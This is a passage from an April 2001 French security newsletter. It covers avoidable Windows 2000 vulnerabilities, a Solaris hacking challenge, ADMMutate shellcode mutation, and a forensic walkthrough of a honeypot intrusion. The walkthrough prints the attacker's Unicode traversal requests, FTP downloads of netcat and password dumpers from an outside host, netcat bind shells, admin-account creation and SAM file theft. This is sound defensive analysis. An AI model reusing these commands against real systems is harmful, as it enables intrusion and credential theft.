MS01-005 Packaging Anomaly Could Cause Hotfixes to be Removed X X Catalogue système Non 

MS01-001 Web Client Will Perform NTLM Authentication Regardless 

of Security Settings 

X X ‘Web Extender Client’ Oui 

MS00-099 Directory Service Restore Mode Password Vulnerability X Outil ‘Configure your server’ Oui (3) 



Non (1)

Avril 2001 

MS00-098 Indexing Service File Enumeration Vulnerability X X Service d’indexation Oui 

MS00-096 SNMP Parameters Vulnerability X X Base de registre Non 

MS00-089 Domain Account Lockout Vulnerability X X Implémentation de NTML Oui (3) 

MS00-085 ActiveX Parameter Validation Vulnerability X X Contrôle ActiveX Oui 

MS00-084 Indexing Services Cross Site Scripting Vulnerability X X Service d’indexation Oui 

MS00-083 Netmon Protocol Parsing Vulnerability X Analyseur de protocole Oui 

MS00-081 New Variant of VM File Reading Vulnerability X X Machine Virtuelle Java Oui 

MS00-077 NetMeeting Desktop Sharing Vulnerability X X NetMeeting Oui 

MS00-070 Multiple LPC and LPC Ports Vulnerabilities X X Mécanisme de gestion des LPC Oui 

MS00-069 Simplified Chinese IME State Recognition Vulnerability X X Gestionnaire ‘IME’ (Input Method 

Editor) 

Oui 

MS00-067 Windows 2000 Telnet Client NTLM Authentication X X Authentification NTLM via Telnet Oui 

Vulnerability 

(2) 

MS00-066 Malformed RPC Packet Vulnerability X X Service RPC Oui 

MS00-065 Still Image Service Privilege Escalation Vulnerability X X Service ‘Still Image’ Oui 

MS00-062 Local Security Policy Corruption Vulnerability X X Service RPC Oui 

MS00-059 Java VM Applet Vulnerability X X Machine Virtuelle Java Oui 

MS00-053 Service Control Manager Named Pipe Impersonation 

Vulnerability 

X X ‘Service Control Manager’ Non (1) 

MS00-052 Relative Shell Path Vulnerability X X Séquence de démarrage Non 

MS00-050 Telnet Server Flooding Vulnerability X X Serveur Telnet Oui 

MS00-047 NetBIOS Name Server Protocol Spoofing Vulnerability X X Protocole NetBios Non 

MS00-037 HTML Help File Code Execution Vulnerability X X VBS ‘Windows.showHelp()’ et objet 

‘HHCtrl’ 

Oui 

MS00-036 ResetBrowser Frame and Host Announcement Frame 

Vulnerabilities 

X X Service ‘Computer Browser’ Oui 

MS00-032 Protected Store Key Length Vulnerability X X API de cryptographie Non 

MS00-029 IP Fragment Reassembly Vulnerability X X Pile réseau Non 

MS00-027 Malformed Environment Variable Vulnerability X X Interpréteur 

‘cmd.exe’ 

de commande Oui 

MS00-026 Mixed Object Access Vulnerability X Active Directory Non (1) 

MS00-021 Malformed TCP/IP Print Request vulnerability X X Service d’impression TCP/IP Oui 

MS00-020 Desktop Separation Vulnerability X X Mécanisme de cloisonnement des 

processus 

Non 

MS00-011 VM File Reading Vulnerability X X Machine Virtuelle Java Oui 

MS00-006 Malformed Hit-Highlighting Argument Vulnerability X X Service d'indexation Oui 

Légendes S: W2K Serveur 

P: W2K Professional 

Evitable: Vulnérabilité pouvant être évitée/éliminée/parée en appliquant les directives du guide 

Renvois: (1) L’origine de la vulnérabilité est inhérente au système 

(2) Possible en désactivant l’option d’authentification NTLM sur les clients Telnet 

(3) Problème de configuration 

Il est intéressant de constater que sur les 38 vulnérabilités émises, plus des deux tiers auraient pu être 

évitées. Celles-ci correspondant à une faille contenue dans un service ou application tel que WebDAV ou la Machine 

Virtuelle Java (JVM). 

Nombre de bulletins Microsoft Windows 2000 Server / Professional 38 100 % 

Vulnérabilités évitables 26 68 % 

Vulnérabilités non-évitables 12 32 % 

Windows 2000 n’est cependant pas le seul système à souffrir de la négligence des utilisateurs. Il est très facile de 

faire le parallèle avec d’autres systèmes d’exploitation tel que Linux. On se souvient en effet de la vulnérabilité 

affectant le service 'LPRng'. Ce service, utilisé lors de requêtes d’impression, possède une fonction vulnérable, à 

savoir syslog(). Le problème est que ce service reste activé sur la plupart des systèmes reliés à l’Internet conduisant 

à une faille exploitable depuis le monde extérieur. 

En résumé, ce guide, même s’il est exclusivement orienté Windows 2000 pourrait, dans les grandes lignes, 

satisfaire tout type de système. Seules les options de configuration devront être adaptées à chaque environnement. 



Avril 2001 

C’est probablement pour cette raison que ce document restera une référence dans l’art et la manière de sécuriser (ou 

plus exactement renforcer) un système d’exploitation Windows 2000. 


http://www.systemexperts/com/win2k.shtml 

http://www.systemexperts.com/win2k/hardenW2K11.pdf 

TECHNIQUES 

CHALLENGE ARGUS SYSTEMS 

Description 

Le 5 ième défi initié par la société Argus Systems concernant son logiciel d'isolation 'PitBull' a été remporté par un 

groupe de 4 hackers Polonais. Dans son communiqué de presse, et contrairement aux habitudes, Argus fait le 

panégyrique du 'professionnalisme' ce groupe portant le doux nom de LSD, acronyme bien connu de … Last Stage of 

Delirium … 

Dans les faits, la lecture de ce communiqué de presse est d'autant plus intéressante que le rapport écrit par LSD, 

détaillant les principes mis en œuvre, n'est pas publiquement accessible pour des raisons déontologiques. L'analyse 

des événements à l'origine du succès de l'attaque menée par LSD proposée par Argus Systems est cependant 

suffisamment détaillée pour déterminer la vulnérabilité exploitée ! 

As a conscientious member of the security community, Argus owes a professional obligation to operating 

system vendors supporting the Intel x86 architecture - the most widely-deployed system architecture in the 

world. Via the LSD exploit, Argus has become aware of the vulnerability in the architecture and must notify 

system vendors and afford them an opportunity to take corrective action if necessary prior to Argus releasing 

the details of this exploit. Complete details will be delivered to the public domain as soon as our professional 

obligations have been satisfied. 

Notons qu'Argus Systems utilise ce communiqué pour exposer sa doctrine largement inspirée par le rapport 'The 

Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments' déjà mentionné à 

propos de 'LINUX SE'. 

This successful exploit is concrete and dramatic validation of the message we have been trying to deliver to the 

market, namely: operating system security is absolutely mandatory in today's environment. Users 

cannot even dream of securing their sites without immediate and appropriate consideration of 

operating system security. 

Le défi lancé mi-avril consistait à acquérir des privilèges autres que ceux accordés au titulaire d'un compte licite. A 

cette fin, un certain nombre de comptes libres d'accès ont été ouverts par Argus sur un système Solaris x86 

sécurisé par PitBull. 

En pratique, pour remporter ce défi, LSD a dû contourner la protection apportée par PitBull en attaquant au plus bas 

niveau, c'est à dire celui de la gestion de l'architecture du processeur INTEL par le noyau du système d'exploitation 

Solaris. 

Il semble que LSD ait adapté son attaque pour tirer parti d'un problème 'subtil' dans la gestion des descripteurs de 

contexte LDT (Local Data Table), problème ayant fait l'objet d'une alerte en environnement NetBSD. 

A subtle bug in validation of user-supplied arguments to a syscall can allow allow user applications on the i386 

platform to transfer control to arbitrary addresses in kernel memory, bypassing normal system protections. 

Il s'agit probablement de l'alerte 'x86 USER_LDT validation' publiée en février 2001. Cette alerte n'a jamais fait l'objet 

d'une reprise dans un environnement autre que NetBSD et pourtant LSD vient de démontrer qu'au moins un autre 

système est vulnérable … 


http://www.argus-systems.com/events/infosec/#Rules 

http://www.lsd-pl.net/aboutus.html 

http://www.linuxsecurity.com/advisories/netbsd_advisory-1157.html 

ADMMUTATE 

Description 

L'annonce, en début de mois, de la disponibilité d'un outil permettant d'échapper aux mécanismes de détection 

d'intrusion (IDS) a fait l'effet d'une bombe dans la presse spécialisée provoquant une réponse 'laconique', voire 

'fallacieuse', de la part de certains éditeurs. 

Le coupable est 'ADMMutate', une librairie développée par un hacker canadien, connu sous le pseudonyme de K2 

(du nom d'un célèbre sommet de l'himalaya), membre du groupe ADM, groupe à l'origine de nombreux outils 

d'attaques 'remarquables' dont le vers ADMw0rm (Mars 1999). 

En pratique, 'ADMMutate' exploite une faiblesse inhérente à la génération actuelle des systèmes de détection 

d'intrusion: l'utilisation d'une stratégie basée sur la recherche d'une signature connue et invariante. A ce titre, 

et sans vouloir encenser la communauté des hackers, force est de constater que la polémique déclenchée autour de 

cet 'outil' aura permis de faire prendre conscience des limitations des produits d'IDS. Il est fort probable que de 

nouvelles stratégies d'analyses soient rapidement intégrées dans ces produits, reproduisant le phénomène constaté il 



Avril 2001 

y a quelques années avec les produits anti-virus. 

'ADMMutate' permet de modifier la forme d'un code binaire (dit ShellCode) sans pour autant modifier ses 

fonctionnalités. En considérant qu'une grande partie des tentatives d'intrusion s'appuient sur une vulnérabilité de type 

'débordement de buffer' nécessitant la transmission d'un code binaire destiné à être exécuté sur le système attaqué, 

un tel outil permettra d'échapper à la majorité des systèmes d'IDS utilisant une stratégie de recherche d'une 

signature. 

Cette stratégie de camouflage n'est pas nouvelle et il est étonnant qu'elle n'est pas été mise plus tôt sur la place 

publique. Utilisée depuis plus de 8 ans par les virus dits 'Polymorphiques', elle a conduit les éditeurs de produits 

anti-virus à devoir faire rapidement évoluer leurs produits comme nous le précisions précédemment. 

Quatre techniques sont ainsi employées dans le cadre de l'écriture de codes malicieux de type Virus: 

1. Le réordonnancement de certaines fonctions commutatives: 

L'ordre d'exécution de certaines fonctions est indifférent. 

Les codes associés peuvent donc être déplacés. 

MOV EAX, EBX 89D8 MOV EAX, EBX 89CA 

MOV EDX, ECX 89CA MOV EDX, ECX 89D8 

2. Le réordonnancement de la distribution du code: 

Les fonctions sont chaînées et peuvent être 

réordonnancées selon un processus bien spécifique. 

F1 (JUMP F2) 

F1 (JUMP F2) 

F2 (JUMP F3) 

F3 (JUMP F4) 

F3 (JUMP F4) 

F2 (JUMP F3) 

F4 (JUMP F5) 

F4 (JUMP F5) 

3. L'utilisation d'instructions équivalentes: 

Les instructions utilisées sont modifiées par leurs 

équivalents logiques. La taille de l'instruction peut 

cependant changer 

MOV AX, 0 B80000 XOR AX, AX 31C0 

MOV AX, 0 B80000 SUB AX, AX 29C0 

ADD CX, #1 83C101 INC CX 

41 

4. Le chiffrement à clef aléatoire 

Les instructions utilisées sont chiffrées en utilisant une 

clef aléatoire modifiée à chaque génération et stockée 

en tant que données dans le code. La routine de 

chiffrement/déchiffrement pourra être dissimulée par 

utilisation des techniques précédentes 

A B C D F G H I J 

B C A D G F I H J 

APOGEE Communications - © B.VELLE 

A B C D F G H I J 

A C H I F B G D J 




A := 0 


B := B * 2 C := C + 1 IF D > 1 THEN 

A := A - A B := B

Avril 2001 

ftp://adm.freelsd.net/pub/ADM 

http://www.ktwo.ca/c/ADMmutate-0.7.3/README 

http://www.ktwo.ca/c/ADMmutate-0.7.3.tar.gz 

NTATTACK - HONEYNET SCAN OF THE MONTH 

Description 

Parfait complément de la rubrique 'Today's GIAC Detect', le projet 'HoneyNet -Scan of the Month' offre 

décidément une source inépuisable d'informations à qui sait en tirer parti. En conséquence, nous vous proposons les 

résultats de notre travail d'analyse du défi N°14. Celui-ci porte sur une attaque détectée en février sur le serveur 

NT 'lab.wiretrip.net', en réalité un attrape-mouche. Les seules informations fournies consistent en un fichier binaire 

contenant la journalisation de l'attaque réalisée avec l'outil Snort. 

La première étape vise à rendre intelligibles les données journalisées au format 'tcpdump'. En temps normal, l'outil 

Snort sera mis à contribution pour générer un fichier contenant un format directement lisible. Ce fichier pourra être 

lui-même retraité par l'utilitaire 'SnortSnarf' qui permet la génération de pages HTML navigables. Une autre solution 

consiste à utiliser le remarquable analyseur réseau multi-protocole 'EtherReal' qui dispose d'une fonction d'import et 

de visualisation supportant plus de 10 formats dont le format tcpdump. Nous avons opté pour cette dernière solution 

qui autorise une analyse totalement autonome et en temps différé sur un système NT. 

Le fichier binaire chargé dans EtherReal contient 6310 enregistrements, chaque enregistrement correspondant à un 

paquet transmis sur le réseau. Face à cette quantité de données, et sans autres informations, la première étape de 

l'analyse consiste à identifier rapidement les grandes lignes de l'attaque puis à mettre en évidence les échanges 

suspects. L'objectif est d'éliminer au plus vite le bruit généré par les échanges licites ou sans intérêt. La seconde 

étape visera à comprendre, par le détail, l'attaque, c'est à dire la succession d'événements ayant conduit à 

potentiellement compromettre le système cible. Enfin, une synthèse pourra être établie qui permettra de quantifier 

sans erreur l'atteinte réelle et de définir les mesures de protection et de reprise d'activité. 

Plusieurs techniques vont être successivement détaillées, l'objectif étant de montrer qu'aucune de ces techniques ne 

peut se suffir à elle-même. Le temps d'analyse est précisé à titre purement indicatif. 

Analyse de niveau "Chaîne" (Durée approximative: 20mn) 

Avant même d'engager une analyse approfondie des traces, l'utilisation de quelques outils rudimentaires, mais très 

efficaces, peut permettre de mettre en évidence rapidement certains éléments caractéristiques d'une attaque. 

Identification 

Une simple recherche des chaînes de caractères visualisables menée avec un éditeur binaire ou avec l'utilitaire 

'strings', disponible en environnement UNIX mais aussi NT, permet de visualiser certains éléments pertinents de 

l'attaque et d'identifier immédiatement les techniques utilisées. Attention, l'environnement NT supportant le codage 

UNICODE (caractères codés sur 16bits soit 2 octets), l'utilisation de la version NT de 'strings' est fortement 

conseillée ! 

La recherche des chaînes de caractères UNICODE (strings snort-0204@0117.log) donne un premier 

ensemble d'indices: 

Strings snort-0204@0117.log.gz | more (extraits significatifs du résultat de la commande) 

Select * from Customers where City=' 

shell("cmd /c echo werd >> c:\fun")

Avril 2001 

GET /guest/default.asp/.. 

../.. 

../..%AF../..%C0%AF../boot.ini HTTP/1.1

Avril 2001 

La recherche du mot ' GET ' permet de lister les commandes passées en exploitant la vulnérabilité 'UNICODE' 

dont nous pouvons constater quelles sont similaires aux commandes précédentes ! 

strings -a snort-0204@0117.log.gz | find "GET" (les doublons ont été éliminés de cet extrait) 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1 

GET /guest/default.asp/.. 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\ 

cmd.exe +cmd1.exe HTTP/1.1 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe 

?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 


?/c+echo+johna2k+>>ftpcom HTTP/1.1 


?/c+echo+haxedj00+>>ftpcom HTTP/1.1 


?/c+echo+get+nc.exe+>>ftpcom HTTP/1.1 


?/c+echo+get+pdump.exe+>>ftpcom HTTP/1.1 


?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1 


?/c+echo+quit+>>ftpcom HTTP/1.1 


?/c+ftp+-s:ftpcom HTTP/1.1 


?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1 

Analyse de niveau "Réseau" (Durée approximative: 4 heures, tableau de synthèse compris) 

Pour aller plus en avant, l'analyse doit maintenant porter sur le contenu de chacun des paquets et nécessite donc 

l'utilisation d'EtherReal et des mécanismes de filtrages associés mais aussi une bonne 'dose' de patience pour 

démêler les fils de l'écheveau ! 

Sources 

Quatre sites dignes d'intérêt sont rapidement identifiés: 

www.nether.net, portail d'un fournisseur de comptes Internet gratuits 

1Cust162.tnt13.stk3.da.uu.net (213.116.251.162), point d'accès du fournisseur UUNET 

freedu-12-26.libertysurf.se (212.139.12.26), point d'accès du fournisseur libertysurf 

ip60-156.hksp.net (202.85.60.156), dont le domaine appartient à une société basée à Hong Kong 

Notons que les systèmes situés derrière ces deux dernières adresses dynamiques sont totalement contrôlés par 

l'attaquant. 

Protocoles 

Un simple tri sur la colonne 'protocole' permet d'obtenir très rapidement une 'cartographie' des protocoles utilisés. 

Ce tri met en évidence la présence de six protocoles - 

HTTP, FTP, Diameter, X25 et Socks, Netbios - 

dont trois sont, a priori, inattendus. Force est de 

constater que les paquets associés proviennent pour 

la plupart du site à l'origine des connexions HTTP 

transportant les attaques 'VBA Shell' et 'UNICODE': 

1Cust162.tnt13.stk3.da.uu.net 

Diameter [Paquet 0548] 

X25 [Paquet 4030] 

L'analyse du contenu des paquets montre que celuici 

est en réalité une requête HTTP POST contenant 

une attaque ! Rien ne permet d'identifier la cause de 

l'erreur: erreur de l'attaquant ou erreur de 

journalisation due à Snort. 

Socks [Paquets 5995 … 6059] 

Ici tout laisse supposer qu'il s'agit d'une connexion 

licite ou d'un leurre destiné à masquer le sondage 

des accès Socks. Les requêtes sont effectuées depuis 

un accès PPP swbell.net. 

Un second tri utilisant les fonctionnalités de filtrage permet de suivre le cheminement des connexions HTTP et FTP 

(filtre: 'http.request or ftp.request'). Les commandes passées sur le système attaqué via les vulnérabilités 'VBA 

Shell' et 'UNICODE' peuvent alors être étudiées en détail. 

Attaques 



Avril 2001 

Une synthèse commentée de la succession des principaux événements est proposée dans le tableau suivant établi à 

la suite d'une analyse des échanges menée en deux temps: 

- Parcours rapide et non directif ayant pour objectif d'identifier les grandes phases de l'attaque et les éléments 

associés: sources, protocoles, données caractéristique. Le tableau de synthèse est initialisé. 

- Parcours détaillé des trois grandes phases précédemment identifiées après élimination du bruit au moyen de 

filtres plus ou moins complexe: connexions licites, activités non liées au cœur de l'attaque. Le tableau est 

complété et affiné. 

Les trois phases identifiées sont dénommées, ci-après, 'Incident'. 

HEURE: 09h16 

INCIDENT N°1 Une attaque est perpétrée depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net 

Méthode Paquet Commande Commentaire 

UNICODE 117 Lecture BOOT.INI OK à la 4 ième variation 

HTTP 130 Sondage présence MSADC Erreur de frappe 

HTTP 140 Sondage présence MSADC pour attaque VBAShell MSADC est présent, 

HTTP 149 Sondage Fonction MSADC AdvancedFactory.Query Signature ADM!ROX!YOUR!WORLD 

UNICODE 161 DIVERS Sondage type de système 

VBAShell 182 

201 

220 

239 

258 

277 

296 

299 

340 

- Shell(cmd /c echo johna2k > ftpcom) 

- Shell(cmd /c echo hacker2000 >> ftpcom) 

- Shell(cmd /c echo get samdump.dll >> ftpcom) 

- Shell(cmd /c echo get pdump.exe >> ftpcom) 

- Shell(cmd /c echo get nc.exe >> ftpcom) 

- Shell(cmd /c quit>> ftpcom) 

- Shell(cmd /c fto -s ftpcom -n www.nether.net) 

Exécution du script et connexion FTP 

- Shell(cmd /c pdump.exe >> new.pass) 

Délai 10s Un délai pour garantir la bonne terminaison du programme 

VBAShell 359 

378 

397 

416 

435 

- Shell(cmd /c echo johna2k > ftpcom2) 

- Shell(cmd /c echo hacker2000 >> ftpcom2) 

- Shell(cmd /c put new.pass >> ftpcom2) 

- Shell(cmd /c quit>> ftpcom2) 

- Shell(cmd /c fto -s ftpcom2 -n www.nether.net) 

Première tentative visant à rapatrier des 

outils sur le système cible. L'attaque est 

infructueuse, l'authentification étant 

rejetée par www.nether.net 

Récupération des mots de passe acquis 

lors de l'étape précédente. Bien entendu, 

le fichier n'existe pas et la connexion ftp 

reste infructueuse, l'authentification étant 

toujours rejetée par www.nether.net 

Délai 18s Le temps de constater que le fichier n'est pas présent sur le compte johna2k ? 

VBAShell 518 - Shell(cmd /c fto 213.116.251.162) Vérification de la connectivité 

Diameter 548 - Shell(cmd /c echo open 213.116.251.162 > ftpcom) Une erreur de codage du paquet ! 

VBAShell 567 

586 

605 

624 

643 

662 

681 

- Shell(cmd /c echo johna2k > ftpcom) 

- Shell(cmd /c echo hacker2000 >> ftpcom) 

- Shell(cmd /c echo get samdump.dll >> ftpcom) 

- Shell(cmd /c echo get pdump.exe >> ftpcom) 

- Shell(cmd /c echo get nc.exe >> ftpcom) 

- Shell(cmd /c quit>> ftpcom) 

- Shell(cmd /c fto -s ftpcom) 

Seconde tentative visant à rapatrier des 

outils sur le système cible. Le fichier 

ftpcom est incomplet et ne contient pas 

l'adresse du site ftp ! 

L'attaquant ne passe pas aveuglément à la 

seconde étape consistant à lancer l'un des 

programmes chargés car il contrôle le 

système situé derrière 213.116.251.162 

Délai 1mn05s Le temps de constater qu'aucune connexion ftp n'est établie depuis la machine attaquée 

VBAShell 700 - Shell(cmd /c open 213.116.251.162) Une erreur de codage manifeste 

719 - Shell(cmd /c echo johna2k >> sasfile) 

Troisième tentative sur un autre site dans 

738 - Shell(cmd /c echo haxedj00 >> sasfile) 

un ordre légèrement différent mais encore 

757 - Shell(cmd /c echo get pdump.exe >> sasfile) 

avec une erreur. La commande initiale 

776 - Shell(cmd /c echo get samdump.dll >> sasfile) 

devrait être: 

795 - Shell(cmd /c echo get nc.exe >> sasfile) 

echo open 213.116.251.162 > sasfile 

813 - Shell(cmd /c quit>> ftpcom) 

et non 

832 - Shell(cmd /c fto -s ftpcom) 

open 213.116.251.162 

Délai 1mn29s La connexion ftp n'est toujours pas établie par la machine attaquée 

VBAShell 851 - Shell(cmd /c open 213.116.251.162) Cela devient lassant ! 

870 - Shell(cmd /c echo johna2k >> sasfile) 

Troisième tentative sur un autre site dans 

888 - Shell(cmd /c echo haxedj00 >> sasfile) 

un ordre légèrement différent mais 

906 - Shell(cmd /c echo get pdump.exe >> sasfile) 

toujours avec la même erreur ! 

924 - Shell(cmd /c echo get samdump.dll >> sasfile) 

943 - Shell(cmd /c echo get nc.exe >> sasfile) 

962 - Shell(cmd /c quit>> ftpcom) 

981 - Shell(cmd /c fto -s ftpcom) 

Délai 38s Rapide changement de stratégie. L'attaquant n'a pas compris l'origine du problème 'ftp' !! 

UNICODE 991-4 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Le comportement de l'attaquant est 

1004-7 cmd1.exe echo open 213.116.251.162 > ftpcom 

décidément incompréhensible: toutes les 

1017-20 cmd1.exe echo johna2k >> ftpcom 

attaques UNICODE sont transmises en 

1030-33 cmd1.exe echo haxedj00 >> ftpcom 

utilisant quatre variations, la dernière 

1042-45 cmd1.exe echo get nc.exe >> ftpcom 

étant acceptée. Pourtant, les résultats de 

1054-57 cmd1.exe echo get pdump.exe >> ftpcom 

la tentative d'acquisition du fichier 

1067-70 cmd1.exe echo get samdump.dll >> ftpcom 

'boot.ini' [Paquet 117] permettaient 

1080-83 cmd1.exe echo quit >> ftpcom 

d'identifier la bonne variation. Une seule 

1092-95 cmd1.exe fto -s ftpcom 

hypothèse: l'attaquant utilise un script 

1100 Exécution du script et connexion FTP 

qu'il ne maîtrise pas ! Un 'professionnel' 

1109 - Transfert nc.exe 

aurait adapté ce script afin de minimiser 

1202 - Transfert pdump.exe 

les traces et d'optimiser l'attaque ! 

1266 - Transfert samdump.dll 

Durée 2s L'attaquant n'attend pas la fin des transferts pour engager la seconde phase de l'attaque 

UNICODE 1233-36 cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969 



Avril 2001 

Durée 8s A partir de cet instant, l'attaquant attaque sur 2 fronts en maintenant la connexion ouverte 

NC 6969 1342 Ouverture connexion TCP port 6969 

Accès distant sur le système 

1345 - 'dir' 

Localication de pdump.exe 

UNICODE 1361 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Récupération des mots de passe 

NC 6969 1371 - 'dir' (plusieurs fois) 

Contrôle du résultat de pdump.exe 

1398 - 'del ftpcom' 

Effacement du fichier de commande 

1411 - 'dir' 


1430 - 'type readme' 

???? 

UNICODE 1444 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative 

Durée 1mn03s Désormais, l'attaquant travail en mode interactif mais n'est pas sûr de lui ! 

NC 6969 1458 -'c:' 

Commande erronée 

1462 - 'cd \' 

Retour à la racine 

1466 - 'dir' 

Visualisation du répertoire 

1479 - 'rm' 

Erreur, on n'est pas sous UNIX ! 

1489 - 'del fun' 

Destruction d'un fichier inexistant 

1493 - 'dir' 

On vérifie 

1506 - 'cd exploites' 

Déplacement vers un répertoire inexistant 

1510 - 'dir' 

On vérifie 

1521 - 'cd exploits' 'dir' 

On parcours les différents répertoires 

1544 - 'cd microsoft' 'dir' 'cd exploits' 

Et on atteint le rythme de croisière 

1562 - 'cd newfile' 'dir' 'cd ..' 

1582 - 'cd unix' 'dir' 'cd ..' 

1605 - 'cd ..' 'dir' 

De retour à la racine 

UNICODE 1623 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative 

Durée 2mn08s De très nombreuses erreurs confirment l'inexpérience ou la nervosité de l'attaquant 

NC 6969 1633 - 'dir' 


1642 - 'dir ..' 'dir' 

En se trompant à plusieurs reprises 

1660 - 'cat yay.txt' 

Il ne s'agit pas d'un système UNIX 

1668 - 'type yay' 'type aya.txt' 

Mais bien d'un système NT 

1691 - 'net session' [Access denied] 

Visualisation des connexions NetBios 

1702 - 'net users' 

Visualisation des comptes locaux 

Durée 2mn33s L'attaquant est persuadé disposer de privilèges supplémentaires via l'attaque UNICODE !!! 

UNICODE 1734 cmd.exe /c net session >> yay2.txt 

Nouvelle tentative de visualisation Netbios 

1753 cmd.exe /c net session >> yay2.txt 

Incrédulité ou naïveté 

NC 6969 1765 - 'dir' 

Contrôle du résultat 

1782 - 'type aya2.txt' 

Le fichier a été crée mais ne contient rien 

1799 - 'del aya2.txt' 

Destruction des traces (quid de 'yay.txt' !) 

1826 - 'net session > yay3.txt' 

Quelle persévérance 

1849 - 'dir' 'del yay&.*' 

Destruction laborieuse des traces 

1866 - 'del yay.*' 

Cannot …. Used by another process' !!! 

1885 - 'del yay3.txt' 'dir' 

Not found. La tension monte … 

UNICODE 1905 cmd.exe /c net user >> heh.txt 

Oubli, le résultat est déjà connu 

1992 cmd.exe /c net user >> c:\heh.txt 

Durée 31s Les actions suivantes se répètent avec toujours de nombreuses erreurs de frappe. 

UNICODE ….. 

Durée 1mn08s L'attaquant ne peut s'empêcher de signer son 'forfait' ! 

NC 6969 2085 echo Hi, i know that this a is a lab server but patch the Tout exploit doit être signé sinon à quoi 

holes ! :-) >> README.NOW.Hax0r 

bon se fatiguer.. 

Durée 4mn35 Il tente de créer 2 utilisateurs déjà déclarés en utilisant l'aide en ligne ! 

NC 6969 2187 'net group ?' 

Une bonne dizaine de tentatives pour 

2203 'net group /?' 

arriver à visualiser les groupes déclarés ! 

UNICODE 2320 cmd.exe /c net localgroup DomainsAdmins WAM_KENNY Et toujours de multiples erreurs en 

2339 /ADD 

cmd.exe /c net localgroup DomainsAdmins IUSR_KENNY 

/ADD 

voulant créer un compte privilégié ! 

NC 6969 2401 'net local group domains admins' 

Idem en interactif. L'attaquant semble 

2445 'net localgroup adm inistrators' 

découvrir les subtilités de l'administration 

UNICODE 2452 cmd.exe /c net localgroup Administrators IUSR_KENNY /ADD Et toujours de multiples erreurs en 

2471 cmd.exe /c net localgroup Administrators WAM_KENNY /ADD voulant créer un compte privilégié ! 

NC 6969 2506 'net localgroup administrators' On contrôle le résultat en interactif 

Durée 2mn28 Les actions suivantes visent à parcourir le système avec de nombreuses erreurs 

NC 6969 

….. 

2773 'ps u' 

Toujours et encore UNIX 

2786 'pdump.exe' 

…. 

[Failed to open LSA] 

Une explication du problème rencontré ! 

Durée 6mn25 Une nouvelle tentative de création d'un compte est effectuée 

UNICODE 2814 cmd.exe /c net user testuser UgotHacked /ADD 

2833 cmd.exe /c net localgroup Administrators testuser /ADD 

NETBIOS 2840 NETBIOS over TCP Tentative de connexion 

NC 6969 2903 'net users' 

… 

Hélas, le compte n'a pas été créé 

2949 'net users hi guy /add' 

… 

Encore une tentative sans succès 

2980 'net password' 

… 

Une commande inexistante 

3055 'net user himan Har Har666 /ADD' 

Une nouvelle tentative qui échoue 

Durée 17s Finalement, l'attaquant efface (presque) toutes ses traces 



Avril 2001 

NC 6969 3149 

3163 

'del samdump.dll' 

'del pdump.exe' 

Ici encore, de nombreuses commandes 

erronées sont passées 

Durée 6mn54s Puis tente de récupérer le contenu de la base de sécurité dont les mots de passe 

NC 6969 3196 'cd repair' 

Le répertoire de backup 

'rdisk /s' 

De multiples appels sans succès à 'rdisk' 

3282 'cat' 

Toujours et encore UNIX 

3295 'type sam._' [Access Denied] 

Une tentative désespérée ! 

UNICODE 3328 cmd.exe /c rdisk -s 

L'attaquant ne sait plus comment faire ! 

3348 cmd.exe /c rdisk 

Et teste différentes syntaxes après avoir 

3392 cmd.exe /c rdisk -s / 

visualisé à plusieurs reprises le répertoire. 

3434 cmd.exe /c rdisk /s - 

Un essai avec un mécanisme UNIX 

3527 cmd.exe /c type c:\winnt\repair\sam._ >> c:\har.txt 

Pour enfin aboutir au résultat 

NC 3640 'exit' Déconnexion par arrêt de l'interpréteur 

Durée 2mn17s L'attaquant tente de récupérer le fichier via une nouvelle connexion sur le port TCP/6968 

UNICODE 3747 cmd1.exe nc -l -p 6968 cmd1.exe Activation d'un accès caché sur TCP/6968 

NC 6968 3920 'copy c:\har.txt c:\InetPub\wwwroot' Copie du fichier sous la racine WEB 

HTTP 3927 GET /har.txt Et récupération réussie du fichier 

NC 6968 3950 'del har.txt' Destruction de la copie sous la racine WEB 

Durée 3mn22s L'attaquant réussi à détruire la copie du fichier à la racine du serveur après plusieurs 

tentatives en mode interactif et indirect. 

NC 6968 

Il s'acharne - plus de 15 essais - à tenter de détruire le fichier déjà éliminé car il oublie de changer de 

UNICODE 

répertoire ! 

Durée 35s Les volumes disques existant sont ensuite systématiquement recherchés 

NC 6968 4095 'd:' 

Tentative de changement de volumes 

4100 'e:' 

portant sur volumes fixes (c: à f:) mais 

4128 'f:' 

aussi amovibles (a:, b:) ! 

4144 'a:' 'b:' 

Durée 15s L'attaquant finit par se déconnecter puis réactive deux portes masquées 

NC 6968 4192 'exit' Déconnexion par arrêt de l'interpréteur 



Durée Quelques attaques continuent durant l'Incident N°2 

UNICODE 4367-70 Lecture BOOT.INI [OK] 

Opération déjà effectuée au tout début 

4381-84 Lecture READ.NOW.Hax0r [Not found] 

L'attaquant ne se souvient plus du nom 

4397-00 Lecture READ.me.NOW.Hax0r [Not found] 

donné il y a 1/2 heure (paquet 2085) ! 

HEURE: 14h20 

INCIDENT N°2 Une attaque est perpétrée depuis l'adresse depuis l'adresse ip60-156.hksp.net 


Durée 4mn19s Il se connecte sur TCP/6868 et immédiatement réengage un parcours des répertoires 

NC 6868 4238 

4295 

4288 

4298 

'dir' 

'mkdir test' 

'type hart.txt' 

Parcours des répertoires. Aucune faute de 

frappe ou erreur ne peut être notée ! 

Durée 20mn58s L'attaquant annonce qu'il a faire à un honey pot et continue à parcourir le système 

NC 6868 4351 

4552 

4971 

5173 

5204 

